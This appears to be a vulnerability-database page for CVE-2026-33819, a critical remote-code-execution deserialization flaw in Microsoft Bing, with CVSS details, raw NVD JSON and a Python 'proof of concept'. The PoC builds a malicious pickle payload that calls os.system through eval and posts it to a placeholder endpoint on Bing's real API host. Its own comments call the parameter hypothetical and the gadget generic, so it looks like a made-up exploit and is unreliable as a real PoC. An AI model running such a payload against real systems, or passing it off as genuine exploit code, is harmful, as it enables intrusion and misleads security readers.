Security Vulnerability Report
中文
CVE-2026-33819 CVSS 10.0 CRITICAL

CVE-2026-33819

Published: 2026-04-23 22:16:38
Last Modified: 2026-05-05 14:15:20

Description

Deserialization of untrusted data in Microsoft Bing allows an unauthorized attacker to execute code over a network.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:bing:-:*:*:*:*:*:*:* - VULNERABLE
Microsoft Bing (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import base64 import pickle import sys # Proof of Concept for CVE-2026-33819 # This script demonstrates how an untrusted deserialization # vulnerability can be triggered by sending a malicious payload. class MaliciousPayload: """ This class represents a gadget that executes a command when deserialized. In a real scenario, this would use specific library gadgets available in the target environment. """ def __reduce__(self): # Execute a simple command (e.g., creating a file) # Note: Adjust command based on target OS (Windows/Linux) return (eval, ("__import__('os').system('echo CVE-2026-33819 > pwn.txt')",)) def generate_payload(): # Serialize the malicious object data = pickle.dumps(MaliciousPayload()) # Encode to base64 to safely transport over HTTP/JSON return base64.b64encode(data).decode() def send_exploit(target_url): payload_data = generate_payload() headers = { "Content-Type": "application/json", "User-Agent": "CVE-2026-33819-Scanner" } # Construct the JSON body. The parameter name 'data' is hypothetical. json_body = { "serialized_data": payload_data } try: print(f"[*] Sending payload to {target_url}...") response = requests.post(target_url, json=json_body, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check target for command execution.") else: print(f"[-] Server returned status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with the actual vulnerable endpoint TARGET = "https://api.bing.microsoft.com/vulnerable-endpoint" send_exploit(TARGET)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33819", "sourceIdentifier": "[email protected]", "published": "2026-04-23T22:16:37.817", "lastModified": "2026-05-05T14:15:20.343", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Deserialization of untrusted data in Microsoft Bing allows an unauthorized attacker to execute code over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:bing:-:*:*:*:*:*:*:*", "matchCriteriaId": "622F4499-3149-4D84-8A29-332A7F498209"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33819", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}